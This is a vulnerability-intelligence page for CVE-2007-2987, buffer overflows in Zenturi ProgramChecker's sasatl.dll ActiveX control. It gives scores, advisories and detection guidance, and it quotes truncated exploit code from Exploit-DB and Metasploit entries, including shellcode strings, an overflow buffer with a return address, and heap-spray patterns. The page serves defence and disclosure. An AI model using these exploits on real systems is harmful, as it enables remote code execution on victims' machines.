CVE-2007-2987
published 2007-06-01CVE-2007-2987: Multiple buffer overflows in certain ActiveX controls in sasatl.dll in Zenturi ProgramChecker allow remote attackers to execute arbitrary code via unspecified…
PriorityP269critical9.3CVSS 2.0
AVNACMAuNCCICAC
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
32.70%
98.1th percentile
Multiple buffer overflows in certain ActiveX controls in sasatl.dll in Zenturi ProgramChecker allow remote attackers to execute arbitrary code via unspecified vectors, possibly involving the (1) DebugMsgLog or (2) DoFileProperties methods.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| zenturi | zenturi_programchecker | — | — |
| zenturi | zenturi_programchecker | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
%AA%A2%39%7E
- →Monitor ActiveX instantiation of sasatl.dll (version 1.5.0.531) in browser processes; calls to DownloadFile method dropping executables to Startup folder are indicative of exploitation. ↗
- →Detect heap spray pattern targeting address 0x0c0c0c0c with NOP sled (%u9090%u9090) in browser memory, characteristic of the Scan() method exploit. ↗
- →Detect use of DebugMsgLog method on the sasatl.dll ActiveX control with oversized buffer arguments (838+ 'A' characters) followed by a return address, indicating stack-based buffer overflow exploitation. ↗
- →The Metasploit exploit module serves a malicious HTML page with Content-Type application/octet-stream for the payload stage; detect HTTP responses of this type originating from exploit infrastructure. ↗
- ·The CVE-2007-2987 vulnerability is specifically tied to sasatl.dll version 1.5.0.531; other versions may not be affected by the DownloadFile/arbitrary file write vector. ↗
- ·CVE-2007-3703 (Fill method stack overflow in sasatl.dll 1.5.0.531) is noted as a distinct issue from CVE-2007-2987; do not conflate the two when writing detection rules. ↗
- ·The PoC exploits were tested specifically on Windows XP Professional SP2 with Internet Explorer 7; detection coverage on other platforms may vary. ↗
CVSS provenance
nvdv2.09.3CRITICALAV:N/AC:M/Au:N/C:C/I:C/A:C
vulncheck9.3CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-5jh3-6rj9-m2g2: Multiple buffer overflows in certain ActiveX controls in sasatl
ghsa_unreviewed·2022-05-01
CVE-2007-2987 [HIGH] CWE-119 GHSA-5jh3-6rj9-m2g2: Multiple buffer overflows in certain ActiveX controls in sasatl
Multiple buffer overflows in certain ActiveX controls in sasatl.dll in Zenturi ProgramChecker allow remote attackers to execute arbitrary code via unspecified vectors, possibly involving the (1) DebugMsgLog or (2) DoFileProperties methods.
GHSA
GHSA-4xh3-2gh4-x6h4: Stack-based buffer overflow in a certain ActiveX control in sasatl
ghsa_unreviewed·2022-05-01·CVSS 9.3
CVE-2007-3703 [CRITICAL] GHSA-4xh3-2gh4-x6h4: Stack-based buffer overflow in a certain ActiveX control in sasatl
Stack-based buffer overflow in a certain ActiveX control in sasatl.dll 1.5.0.531 in Zenturi Program Checker (ProgramChecker) Pro allows remote attackers to execute arbitrary code via a long argument to the Fill method. NOTE: this is probably a different issue than CVE-2007-2987.
GHSA
GHSA-6xjq-wfj9-v6x3: Buffer overflow in a certain ActiveX control in the NixonMyPrograms class in sasatl
ghsa_unreviewed·2022-05-01·CVSS 9.3
CVE-2007-3984 [CRITICAL] GHSA-6xjq-wfj9-v6x3: Buffer overflow in a certain ActiveX control in the NixonMyPrograms class in sasatl
Buffer overflow in a certain ActiveX control in the NixonMyPrograms class in sasatl.dll 1.5.0.531 in Zenturi ProgramChecker allows remote attackers to execute arbitrary code via a long argument to the Scan method. NOTE: this is probably a different issue than CVE-2007-2987.
VulnCheck
zenturi zenturi_programchecker Improper Restriction of Operations within the Bounds of a Memory Buffer
vulncheck·2007·CVSS 9.3
CVE-2007-2987 [CRITICAL] zenturi zenturi_programchecker Improper Restriction of Operations within the Bounds of a Memory Buffer
zenturi zenturi_programchecker Improper Restriction of Operations within the Bounds of a Memory Buffer
Multiple buffer overflows in certain ActiveX controls in sasatl.dll in Zenturi ProgramChecker allow remote attackers to execute arbitrary code via unspecified vectors, possibly involving the (1) DebugMsgLog or (2) DoFileProperties methods.
Affected: zenturi zenturi_programchecker
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.virusbulletin.com/virusbulletin/2010/05/exploit-kit-explosion-part-two-vectors-attack/
No detection rules found.
Exploit-DB
Zenturi ProgramChecker - ActiveX Control Arbitrary File Download (Metasploit)
exploitdb·2010-11-24
CVE-2007-2987 Zenturi ProgramChecker - ActiveX Control Arbitrary File Download (Metasploit)
Zenturi ProgramChecker - ActiveX Control Arbitrary File Download (Metasploit)
---
##
# $Id: zenturiprogramchecker_unsafe.rb 11127 2010-11-24 19:35:38Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Zenturi ProgramChecker ActiveX Control Arbitrary File Download',
'Description' => %q{
This module allows remote attackers to place arbitrary files on a users file system
via the Zenturi ProgramChecker sasatl.dll (1.5.0.531) ActiveX Control.
},
'License' => MSF_LICENSE,
'Author' => [ 'MC' ],
'Version' => '$Revision: 11127 $',
'References'
Exploit-DB
Zenturi NixonMyPrograms Class 'sasatl.dll 1.5.0.531' - Remote Buffer Overflow
exploitdb·2007-07-23
CVE-2007-3984 Zenturi NixonMyPrograms Class 'sasatl.dll 1.5.0.531' - Remote Buffer Overflow
Zenturi NixonMyPrograms Class 'sasatl.dll 1.5.0.531' - Remote Buffer Overflow
---
Zenturi NixonMyPrograms Class (sasatl.dll v. 1.5.0.531) "Scan()" Method
Remote Buffer Overflow Exploit (Heap Spray Technique)
url: http://www.programchecker.com/activeintro.aspx
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
This exploits executes calc.exe
var shellcode = unescape( "%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u0001%u0800" +
"%u75C0%uFE0F%u1285%u0001%uE800%u001A%u0000%uC009%u1074%u0A6A" +
"%u858D%u0114%u0000%uFF50%u0695%u0001%u6100%uC031%uC489%uC350" +
"%u8D60%u02BD%u0001%u3100%uB0C0%u6430%u008B%u408B%u8B0C%u1C40" +
"%u008B%u408B%uFC08%uC689%u3F83%u7400%uFF0F%u5637%u3
Exploit-DB
Zenturi ProgramChecker - ActiveX 'sasatl.dll' Remote Buffer Overflow
exploitdb·2007-06-01
CVE-2007-2987 Zenturi ProgramChecker - ActiveX 'sasatl.dll' Remote Buffer Overflow
Zenturi ProgramChecker - ActiveX 'sasatl.dll' Remote Buffer Overflow
---
Zenturi ProgramChecker ActiveX (sasatl.dll) Remote Buffer Overflow PoC
url: http://www.programchecker.com/activeintro.aspx
original advisory: http://secunia.com/advisories/25473/
Will Dormann, CERT/CC, is credited with the discovery of these issues
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
Tested on Windows XP Professional SP2 all patched, with Internet
Explorer 7
Sub tryMe()
buff = String(838, "A")
get_EIP = unescape("%AA%A2%39%7E") 'call ESI from user32.dll
nop = String(1648,unescape("%90"))
shellcode = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49") & _
unescape("%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36") & _
unescape("%48%48%30%42%33%30%4
Metasploit
Zenturi ProgramChecker ActiveX Control Arbitrary File Download
metasploit
Zenturi ProgramChecker ActiveX Control Arbitrary File Download
Zenturi ProgramChecker ActiveX Control Arbitrary File Download
This module allows remote attackers to place arbitrary files on a users file system via the Zenturi ProgramChecker sasatl.dll (1.5.0.531) ActiveX Control.
No writeups or analysis indexed.
http://osvdb.org/36715http://secunia.com/advisories/25473http://www.kb.cert.org/vuls/id/603529http://www.securityfocus.com/bid/24217http://www.securityfocus.com/bid/24274http://www.vupen.com/english/advisories/2007/1977http://osvdb.org/36715http://secunia.com/advisories/25473http://www.kb.cert.org/vuls/id/603529http://www.securityfocus.com/bid/24217http://www.securityfocus.com/bid/24274http://www.vupen.com/english/advisories/2007/1977
2007-06-01
Published
Exploited in the wild